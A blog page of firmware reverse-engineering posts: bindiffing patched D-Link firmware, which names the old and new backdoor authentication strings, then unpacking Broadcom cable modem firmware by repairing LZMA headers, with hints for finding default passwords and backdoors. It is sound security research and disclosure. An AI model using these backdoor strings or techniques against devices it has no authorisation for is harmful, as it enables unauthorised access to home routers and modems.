<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBV8lis33kdJAS6Cwg7wc3I8dsgwLNonGT2AGWXG_QElcZqHe4TzNuyaIuxJUoIjjLHX0jB9N-8Ao-1_65yytjWeyiDku6IOh4dMqGzckbDmlBAdkJhqJGH1KPRE3JPWJJVPPmseYS-a_3/s1600/busy2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBV8lis33kdJAS6Cwg7wc3I8dsgwLNonGT2AGWXG_QElcZqHe4TzNuyaIuxJUoIjjLHX0jB9N-8Ao-1_65yytjWeyiDku6IOh4dMqGzckbDmlBAdkJhqJGH1KPRE3JPWJJVPPmseYS-a_3/s640/busy2.png" width="640" /></a></div>
<br />
According to the analysis from devttys0, the binary "/bin/webs" had the backdoor function (if you did not read his analysis yet, <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">read it here</a>). Binwally returned a match score of 0 because it was unable to find similar patterns. The binaries have different sizes and were probably compiled using different toolchains, containing different offsets, as displayed on the diff from Winmerge:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjGnK6V4rq8ouEAggSNS6USCIyRXyVGDkmC8DMPSsI2ePZjXQGeE4pqwc7iYW-FmrhPIxyix24G-VvpFG1lRUZmFBSk0_OlY1oL_Dm-SP0KkZYI3Gt7sRlFr2tAvDhyzNW-H1X-o9hsF9/s1600/winmerge.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjGnK6V4rq8ouEAggSNS6USCIyRXyVGDkmC8DMPSsI2ePZjXQGeE4pqwc7iYW-FmrhPIxyix24G-VvpFG1lRUZmFBSk0_OlY1oL_Dm-SP0KkZYI3Gt7sRlFr2tAvDhyzNW-H1X-o9hsF9/s640/winmerge.PNG" width="640" /></a></div>
<br />
Binwalk from v1.3.0 beta on <a href="http://binwalk.org/3d-data-visualizations/">now displays 3D binary data visualization</a>, so let's have a look on how they differ in a 3D plane:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-0skaGwKM5R4MbWrP0PQ5x0aztIxQupSlspJvlrSlovxVoCqXMcPulc7awiiIjga8YoFhGs3ikjficDrkBcRafUFoQtiQjxbWT3OT7SPic-0aDDLMIQGKKSo9mzW8A5IKLqNUQHasmw63/s1600/3d.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-0skaGwKM5R4MbWrP0PQ5x0aztIxQupSlspJvlrSlovxVoCqXMcPulc7awiiIjga8YoFhGs3ikjficDrkBcRafUFoQtiQjxbWT3OT7SPic-0aDDLMIQGKKSo9mzW8A5IKLqNUQHasmw63/s1600/3d.gif" /></a></div>
<br />
This is time to use an approach other than byte comparison and fuzzy hashing. Bindiff uses graph-theoretical approach to compare executables by identifying identical and similar functions. We first need to analyze both files using IDA to create the needed IDB files. After inputting both files on bindiff, we notice a high level of similarity on the Call Graphs:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm44_9rHMvXLMNVaBr5OhE5Ymx0HMXa1vY_5RLjefESyBgzspD8wvZPDb_PjKyh8kT__tfmusIynebEtzx3IljhhJB-QceSjBwoabwi3MIwpD7IwlCtGGNbMYUbvGPAnin45Aia6Jookt1/s1600/bindiff1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="433" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm44_9rHMvXLMNVaBr5OhE5Ymx0HMXa1vY_5RLjefESyBgzspD8wvZPDb_PjKyh8kT__tfmusIynebEtzx3IljhhJB-QceSjBwoabwi3MIwpD7IwlCtGGNbMYUbvGPAnin45Aia6Jookt1/s640/bindiff1.png" width="640" /></a></div>
<br />
Let's focus on the previously backdoored function "alpha_auth_check":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHlTh4KPz9UtnE_9B3YoDRaWwW550Zytn4s_DaQ7ZtWM2eHyR9MWqfReVDkEZWNEb8xxSp5jI_EZTZsq7V3rY9ct3hOw6IWhap75Ivpog_-lBE6mH8RUErcJPizoAP4INO7B2DOZfc_ZFN/s1600/bindiff2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHlTh4KPz9UtnE_9B3YoDRaWwW550Zytn4s_DaQ7ZtWM2eHyR9MWqfReVDkEZWNEb8xxSp5jI_EZTZsq7V3rY9ct3hOw6IWhap75Ivpog_-lBE6mH8RUErcJPizoAP4INO7B2DOZfc_ZFN/s640/bindiff2.png" width="640" /></a></div>
<br />
We can easily spot the difference displaying the flow graph:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoP0nrdXiQkVIQGM3g1UO_OdU44PYcEYCvKYLVGH59uzACKgg7fKlxE-tNF9zlM0KfYN8x6zRd-ALhBRyhNEFRVgEh5cq7BNcfzoFBnUQjuHsh6B1rRgDTaZMyN1NQqnZB5z7BROf2dJFp/s1600/bindiff3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoP0nrdXiQkVIQGM3g1UO_OdU44PYcEYCvKYLVGH59uzACKgg7fKlxE-tNF9zlM0KfYN8x6zRd-ALhBRyhNEFRVgEh5cq7BNcfzoFBnUQjuHsh6B1rRgDTaZMyN1NQqnZB5z7BROf2dJFp/s640/bindiff3.png" width="640" /></a></div>
<br />
Zooming in (courtesy of NSA):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GNxGDeuxN1qPwwPhzosz6oZmOmXt00ku2uLCIsp-SfxVvlPmJlg5fz1B_QslRGuAq6jfCvZyC00WKnP8dy6OKwIKL8wUi7pxRwQdcwY0pRbFAZgdoeAoJgPpOqt0jrTPTmNYoBLm8V2L/s1600/bindiff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GNxGDeuxN1qPwwPhzosz6oZmOmXt00ku2uLCIsp-SfxVvlPmJlg5fz1B_QslRGuAq6jfCvZyC00WKnP8dy6OKwIKL8wUi7pxRwQdcwY0pRbFAZgdoeAoJgPpOqt0jrTPTmNYoBLm8V2L/s640/bindiff4.png" width="640" /></a></div>
<br />
<br />
It seems that Joel's "xmlset_roodkcableoj28840ybtide" is gone, say hello to "iNteLalsEtvaLuewitHoutnAme". And yes, it seems that Joel (and the binaries that can re-configure the device's settings) can only access the device from 127.0.0.1 now =)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBU5drSMUz_Hmw4MWbAsRX2S2shAkJm4vuk2TZ3oBIom8sOvqZA9LXY1dCdjNO3mO2igPaqjxJykQCbCE5w_QQKMRvG7eGdycQGTosr0qJ1XdNXSVuZW2VvnFvfNt8Sf44p_fveyhZ2cZg/s1600/bindiff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="329" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBU5drSMUz_Hmw4MWbAsRX2S2shAkJm4vuk2TZ3oBIom8sOvqZA9LXY1dCdjNO3mO2igPaqjxJykQCbCE5w_QQKMRvG7eGdycQGTosr0qJ1XdNXSVuZW2VvnFvfNt8Sf44p_fveyhZ2cZg/s640/bindiff5.png" width="640" /></a></div>
<br />
<b>Conclusion</b><br />
<br />
Binary and directory tree diffing is a powerful tool for reverse engineering and to find potential compromise of a system as long as you have a "known template". In the context of Embedded Systems, it reveals modified files, settings and directories, narrowing the analysis to a small set of data when analyzing different firmware images.<br />
<br />
To all the vendors out there it's important to be transparent on what's being fixed, alerting the end-users about how critical the issues are. And please, leave the backdooring job to the guys who "<a href="http://www.youtube.com/watch?v=jMUbz4u5_NQ">read the constitution</a>" and are paid for that, OK?<br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-11631664092067064652013-11-11T11:16:00.001-02:002014-01-08T23:57:00.823-02:00Unpacking Firmware Images from Cable ModemsHacking Cable modems used to be very popular during the early 2000’s. People like <a href="http://books.google.com.br/books?hl=pt-BR&id=PblPcRqHM0wC">DerEngel </a>and <a href="http://isabel.la/">Isabella</a> from TCNiSO carried lots of research on the topic and talks from bitemytaco (R.I.P) and BlakeSelf during <a href="https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-self.pdf">DEFCON 16</a> and <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Blake-bitemytaco/DEFCON-18-Blake-bitemytaco-Hacking-DOCSIS.pdf">DEFCON 18</a> covered lots of information on the subject.<br />
<br />
Securing cable modems is more difficult than other embedded devices because, on most cases, you can’t choose your own device/firmware and software updates are almost entirely controlled by your ISP. Most cable modems offer a limited administrative interface and management commands are sent using SNMP.<br />
<br />
<b>Cable Modem Firmware</b><br />
<br />
There are basically three types of firmware images for cable modems:<br />
<br />
- Signed and compresed (PKCS#7 & binary)<br />
- Compressed binary images<br />
- RAM dump images (uncompressed & raw)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
You can dump your own firmware image using <a href="http://www.usbjtag.com/">JTAG</a> or sniffing the connection during upgrades, for example. I’m a big fan of <a href="https://code.google.com/p/binwalk/">binwalk</a> and I always wondered why it doesn't unpack firmwares from popular Broadcom based cable modems so I decided to research on this.<br />
<br />
<b>Unpacking the Firmware</b><br />
<br />
For this analysis I’ll use <a href="http://www.cisco.com/web/consumer/support/modem_DPC3925.html">Cisco DPC3925</a>, which is a very common DOCSIS 3.0 modem here in Brazil. Cisco DPC3925 has a <a href="http://datasheet.elcodis.com/pdf/48/45/484522/bcm3380dkfsbg.pdf">BCM3380</a> chipset, 16MB Flash x 64MB DRAM memory configuration.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9TCyYVRYu8pf0WL5-T8XXYAKP0xYGOWlWyldV3IzcYLLumgkgApH_PDSrJ6Jcl9jS3tLlqi3auHTi_Mi5t3t1Nb6H5sXmydd7HFD9ZUigPzBdHnY7IM6sO0VX6BS9duS0eMfR23ks9c5y/s1600/dpc3925.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9TCyYVRYu8pf0WL5-T8XXYAKP0xYGOWlWyldV3IzcYLLumgkgApH_PDSrJ6Jcl9jS3tLlqi3auHTi_Mi5t3t1Nb6H5sXmydd7HFD9ZUigPzBdHnY7IM6sO0VX6BS9duS0eMfR23ks9c5y/s320/dpc3925.png" height="146" width="320" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPAmsk3zRZITEC1aoiQobxfqQ8PU1GxhW7PjQiS9SdG4cF6lzRKfcMFgh3FjitHNAFbHe0RamfrbR-TzM1WxD40sGfKhqdf3Tpg5Z6jdX-SChRIX9N-bl_DeK46XrudwgvwF8hiGhz7jda/s1600/bcm3380.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPAmsk3zRZITEC1aoiQobxfqQ8PU1GxhW7PjQiS9SdG4cF6lzRKfcMFgh3FjitHNAFbHe0RamfrbR-TzM1WxD40sGfKhqdf3Tpg5Z6jdX-SChRIX9N-bl_DeK46XrudwgvwF8hiGhz7jda/s200/bcm3380.png" height="185" width="200" /></a></div>
<br />
The compressed firmware image has around 4MB. Using strings against the file didn't help much and binwalk v1.2.1 (without any additional parameters) did not recognize it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJTDqaLWjWDpLUaH9hH0QL6nkE494k0KkxcwWSwJmJgOUlzYhaf6xPknVRLT5koH910ukMeezgQcBPEQhgVDjBlN5Dpp_tZZNT3qOHr0Eo_eg1FwQ0mWSY-2Vzch1MnKYp2lDhp6h_vHmY/s1600/binwalk1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJTDqaLWjWDpLUaH9hH0QL6nkE494k0KkxcwWSwJmJgOUlzYhaf6xPknVRLT5koH910ukMeezgQcBPEQhgVDjBlN5Dpp_tZZNT3qOHr0Eo_eg1FwQ0mWSY-2Vzch1MnKYp2lDhp6h_vHmY/s400/binwalk1.png" height="161" width="400" /></a></div>
<br />
We can gather lots of useful information from the vendor’s page: user guides, datasheets, licensing information and open source disclaimer for the product. There are no sources available on Cisco's home, but the <a href="http://www.cisco.com/en/US/docs/video/at_home/Cable_Modems/3000_Series/7022138_A.pdf">Copyright Notices section</a> states that the product uses LZMA SDK 4.21.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwOser0UIJ88_adWomXWPGlbOdBufbeqYnjp21CDAQaEBuw9uj1mmuo3vRbJj6sg8sINUCLN5e2zypSFu2NhIMW-eDdtM6uAAgD9PfCjSySQk8UWuCEx1D193zJIWwtpRDEIlTeiV5wQkc/s1600/firm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwOser0UIJ88_adWomXWPGlbOdBufbeqYnjp21CDAQaEBuw9uj1mmuo3vRbJj6sg8sINUCLN5e2zypSFu2NhIMW-eDdtM6uAAgD9PfCjSySQk8UWuCEx1D193zJIWwtpRDEIlTeiV5wQkc/s320/firm2.png" height="320" width="278" /></a></div>
<br />
So we know that the firmware is probably packed using LZMA but we still need to figure out how to unpack it. Binwalk -i displays results marked as invalid during the scan and we might get some clue:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUfwMMWUvPesuUV75vDWmvRXOhQE_aeMxH1N0CYF4oWufUnO4OsR-JgfwqVQRSSeuZg-lnsrbfgSbc0ZWzHqwSzIbRA79gM2thW5UZ6aiKnii9gTj8Mjovy67U9atY3EcDOnspuBFSWec2/s1600/binwalk2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUfwMMWUvPesuUV75vDWmvRXOhQE_aeMxH1N0CYF4oWufUnO4OsR-JgfwqVQRSSeuZg-lnsrbfgSbc0ZWzHqwSzIbRA79gM2thW5UZ6aiKnii9gTj8Mjovy67U9atY3EcDOnspuBFSWec2/s400/binwalk2.png" height="187" width="400" /></a></div>
<div>
<br /></div>
<div>
The LZMA header is not well documented. There are some good resources on <a href="https://github.com/cscott/lzma-purejs/blob/master/FORMAT.md">lzma-purejs Github</a> and you can also check binwalk's <a href="https://code.google.com/p/binwalk/source/browse/trunk/src/magic/lzma">magic file signatures</a> (<a href="https://twitter.com/devttys0">devttys0</a> already did all the hard work for us).<br />
<br />
<div class="code" style="background-color: #f5f8fa; background-repeat: no-repeat no-repeat; border-color: rgb(153, 34, 17); border-style: solid; border-width: 1px 1px 1px 20px; margin: 10px 0px 10px 10px; max-height: 200px; min-height: 10px; overflow: auto; padding: 5px; width: 592.1875px;">
<span style="background-color: transparent; line-height: 16px;"><span style="font-family: Courier New, Courier, monospace;"> Offset Size Description</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;"> 0 1 lc, lp and pb in encoded form</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;"> 1 4 dictSize (little endian)</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;"> 5 8 uncompressed size (little endian)</span></span></div>
<div>
<br /></div>
The Bootloader in the beggining of the flash contains the necessary information to boot the firmware image. On the top of the firmware there's always an extractor which decompress the firmware into DRAM.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5V9mwq4Xg8sdvZxpEkq2m5J29ewoZoMrHqz0j-TNegpsiojaUkK-iIbySuLQc-Lm5SccFKp7JYsJBUSqAKnhvryIfsBXbjOpDYXLonE5ivzgNfsgWH1zE-hbJmlPRNl622qrXRzYgDmpV/s1600/firm1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5V9mwq4Xg8sdvZxpEkq2m5J29ewoZoMrHqz0j-TNegpsiojaUkK-iIbySuLQc-Lm5SccFKp7JYsJBUSqAKnhvryIfsBXbjOpDYXLonE5ivzgNfsgWH1zE-hbJmlPRNl622qrXRzYgDmpV/s400/firm1.png" height="323" width="400" /></a></div>
<br />
Offset 0x677 is a good candidate because it's located in the beginning of the file and it seems to have a valid header. 5D 00 00 00 01 indicates a LZMA compression level of -8 and the next 64 bits should be the data's uncompressed size (in little endian).</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio4rostV-utdMu65PuDoP9yXjPaU-pV3rpv7p-4gKORcEE75O5wOFVNWzu_dZahDobM7uGKcW0c4pBR8QpaJAVYRYGKTb8jpBCLhyphenhyphenHDfCfT2wusWv7qJO6PcBaEtnzZPIVQ5ncHx7DpYy1/s1600/offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio4rostV-utdMu65PuDoP9yXjPaU-pV3rpv7p-4gKORcEE75O5wOFVNWzu_dZahDobM7uGKcW0c4pBR8QpaJAVYRYGKTb8jpBCLhyphenhyphenHDfCfT2wusWv7qJO6PcBaEtnzZPIVQ5ncHx7DpYy1/s640/offset.png" height="315" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The 64 bits following the header (00 20 20 0E 3A 28 AB EF) is clearly not a valid uncompressed size (2898643604054482944 bytes). It represents the actual compressed data, making binwalk and 7zr unable to extract it.<br />
<br />
What we need to do here is append a few extra bytes to the header so our regular 7zr binary can recognize and extract the data. We don't know the uncompressed size for the firmware yet: the good news is that we can append and specify a big value here, allowing 7zr utility to unpack it (although complaining that the EOF was reached too early). Let's specify 268435456 bytes (256MB), convert it to little endian (00 00 00 10 00 00 00 00) and append it to the original LZMA header. The new header should be something like ... 5D 00 00 00 01 00 00 00 10 00 00 00 00 00 20 20 ...<br />
<br />
I took the opportunity to have a look on binwalk's <a href="https://code.google.com/p/binwalk/wiki/API">API</a> and wrote a simple <a href="https://github.com/bmaia/lzma-unpacker">lzma-unpacker.py</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/f095fde8cde3dcd2c74b.js"></script>
This code will be obsolete in a couple of days because I'm pretty sure Binwalk incorporate this (a plugin maybe?)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_-Tok3Kj_dJtKSwEUlRt7lgFAVdagvq-eNe8slMPJ9E1GWh52NSfqDMI-kaOjBNeoM3HnaygXnxxa-WRHlCOQ3mkKZMP70OfpBNiC6VsAF6Re6pefDf3uXOieMP7f3k8mxTLUpjePWBO/s1600/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_-Tok3Kj_dJtKSwEUlRt7lgFAVdagvq-eNe8slMPJ9E1GWh52NSfqDMI-kaOjBNeoM3HnaygXnxxa-WRHlCOQ3mkKZMP70OfpBNiC6VsAF6Re6pefDf3uXOieMP7f3k8mxTLUpjePWBO/s640/screenshot.png" height="394" width="640" /></a></div>
<br />
The data was extracted successfully and contains 21982740 bytes. If we replace the uncompressed size on the LZMA header with the correct value in Little Endian (14 6E 4F 01 00 00 00 00), the 7zr tool would not complain about the file integrity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzjTgcQXb4kKLWRs0W9REKk3OLIbucq1_WKrewnTeTAZKgfpjGMZcr1qhsr6NxxpwZwMq8IQrjS72ssL3SK4tGSgbyNV0b88SxQ7S7MWr5Cb1FuMp5Yd9GHOvLyaeIlD1EZ-B9Yi3jviA/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzjTgcQXb4kKLWRs0W9REKk3OLIbucq1_WKrewnTeTAZKgfpjGMZcr1qhsr6NxxpwZwMq8IQrjS72ssL3SK4tGSgbyNV0b88SxQ7S7MWr5Cb1FuMp5Yd9GHOvLyaeIlD1EZ-B9Yi3jviA/s640/screenshot2.png" height="469" width="640" /></a></div>
<br />
Most Broadcom cable modems are packed this way, including the ones manufactured by different vendors. The script was fully tested and works fine for the following models:<br />
<br />
- Cisco DPC3925, DPC2434<br />
- Motorola SB5100, SB5101, SVG6582, SVG1202<br />
- Thomson ACG905, DCM425, DHG534, DHG544, DWG850, DWG874<br />
- Webstar DPC2203<br />
<br />
<b>Firmware Analysis</b><br />
<br />
Now that you successfully unpacked the firmware, here's a couple of cool things you should do:<br />
<br />
- Find default passwords<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeu0dE1rGikrpgSm8d7VysB8MbKUxdfXeDH30m6VL58_uVIERZNEGws_DSMlJ8T-YXUWQCydDNq7fuJdkmIFc4AG7kV-BiXy4ezhfiSTXUluDgfUVokNoQZjFQ27feqtKHX5WVOZx2Rr2/s1600/defaultpw.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeu0dE1rGikrpgSm8d7VysB8MbKUxdfXeDH30m6VL58_uVIERZNEGws_DSMlJ8T-YXUWQCydDNq7fuJdkmIFc4AG7kV-BiXy4ezhfiSTXUluDgfUVokNoQZjFQ27feqtKHX5WVOZx2Rr2/s640/defaultpw.PNG" height="288" width="640" /></a></div>
<br />
- Find backdoors<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzyshOA7jydIisUERU6D_rv0Eb_DLmOzEMv9nmrWNaqmIEm32B8iWK6p8KDhnuBnK1oafOfSWppqTjmjZU7ykAszcHV52cm0mYjhFbWKkyYnZaKEVmbtWvGo5_K-Jx3QeO_3t9mqvldS8b/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzyshOA7jydIisUERU6D_rv0Eb_DLmOzEMv9nmrWNaqmIEm32B8iWK6p8KDhnuBnK1oafOfSWppqTjmjZU7ykAszcHV52cm0mYjhFbWKkyYnZaKEVmbtWvGo5_K-Jx3QeO_3t9mqvldS8b/s640/backdoor.png" height="252" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzqjPFxbaFU6fsl5r_osBC9LIISGQAjGm8qG257p3LLIoGopsutDwOYtnILvd6XA2GSLLGxNVvfN62RFMmqIGjyPTgMbcVZBrZtjAsj94qqYKtdZ9xw4nzF_Cr5j7J-TgT6teDxfKJVud/s1600/backdoor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzqjPFxbaFU6fsl5r_osBC9LIISGQAjGm8qG257p3LLIoGopsutDwOYtnILvd6XA2GSLLGxNVvfN62RFMmqIGjyPTgMbcVZBrZtjAsj94qqYKtdZ9xw4nzF_Cr5j7J-TgT6teDxfKJVud/s640/backdoor2.png" height="344" width="640" /></a></div>
<br />
- Pentest the Web Application<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQrpcWUD7Xjd99URlRUnBK25mr4fZGALZcnICDSHt4PSOCFTAX-oGuOurmwED1cMVLxGaOzBj3C4E5C8j9i2LwRMI5ZC_o-HwR2yKEJbTl5FXNl7hlWth1tl0J90QnOPyI-29K0ozvOw0L/s1600/carving.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQrpcWUD7Xjd99URlRUnBK25mr4fZGALZcnICDSHt4PSOCFTAX-oGuOurmwED1cMVLxGaOzBj3C4E5C8j9i2LwRMI5ZC_o-HwR2yKEJbTl5FXNl7hlWth1tl0J90QnOPyI-29K0ozvOw0L/s640/carving.png" height="394" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBPk7objnf92px7Jrxtnm_RIHmVwlY3NKYgBLoc7jxC5smb78y0xv3wRtEm5s_8Ywatvm-Ux1UfK2jkdWzxWBh_QeIWqt9YMmVcHcm1gUpJmCTRPkuKZ8G9RzGs_SgsGO4Zft1GOSnN61I/s1600/carving2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBPk7objnf92px7Jrxtnm_RIHmVwlY3NKYgBLoc7jxC5smb78y0xv3wRtEm5s_8Ywatvm-Ux1UfK2jkdWzxWBh_QeIWqt9YMmVcHcm1gUpJmCTRPkuKZ8G9RzGs_SgsGO4Zft1GOSnN61I/s320/carving2.png" height="299" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAbPcz9B6zUUS5_rWir6hCfi1mC6Kn1OnxDMCQ-reC5M-FCQu6iljySX85OCcJzS16_GYtb9yhdl5LlyODQE3TdzmDHGj_pnZG7m1QoCQ0HcG4pbeRZut8z8H7-rLKdJpDTTIZ0r2ljM9z/s1600/carvin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAbPcz9B6zUUS5_rWir6hCfi1mC6Kn1OnxDMCQ-reC5M-FCQu6iljySX85OCcJzS16_GYtb9yhdl5LlyODQE3TdzmDHGj_pnZG7m1QoCQ0HcG4pbeRZut8z8H7-rLKdJpDTTIZ0r2ljM9z/s640/carvin3.png" height="250" width="640" /></a></div>
<br />
- Fingerprint your device and <a href="https://github.com/bonsaiviking/missing-os-fingerprints">submit to NMAP</a><br />
<br />
- <a href="https://community.rapid7.com/community/infosec/sonar/blog/2013/10/27/estimating-readynas-exposure-with-internet-scans">Find similar devices</a> using <a href="http://scans.io/">scans.io</a> dataset<br />
<br />
- Mail <a href="https://twitter.com/hdmoore">HD Moore</a> a copy of the firmware and wait for the <a href="https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities">CVE Spam</a><br />
<br /></div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com33tag:blogger.com,1999:blog-3296471108082693838.post-68609088389707075062013-09-01T10:52:00.001-03:002013-09-01T10:52:31.744-03:00Analyzing and Running binaries from Firmware Images - Part 1During the first part of <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box Firmware analysis</a>, we downloaded the firmware Image, extracted its contents, compared/analyzed its base and found a couple of interesting files (SSH keys, binary files, init scripts, firewall rules and so on).<br />
<br />
For this part we'll focus on identifying binaries, comparing and executing them to find interesting data. Whenever you're analyzing binaries from different architectures, there are a couple of nice tools that aid debugging, reversing and emulating their behavior, like objdump, readelf and QEMU.<br />
<br />
<a href="http://www.emdebian.org/">Embedded Debian Project</a> provides pre-built binary toolchains for mips, mipsel, arm, armel, powerpc, and a couple of other architectures. In order to download and install it on Debian based Linux distros, you have to apt-get its archive signing key:<br />
<div class="code">
sudo apt-get install emdebian-archive-keyring</div>
<br />
Now you you need to include their repository on your /etc/apt/sources.list:
<br />
<div class="code">
deb http://www.emdebian.org/debian/ squeeze main</div>
<br />
After the apt-get update you can install binutils for you target archs:<br />
<div class="code">
sudo apt-get install binutils-mips-linux-gnu binutils-mipsel-linux-gnu binutils-arm-linux-gnueabi</div>
<br />
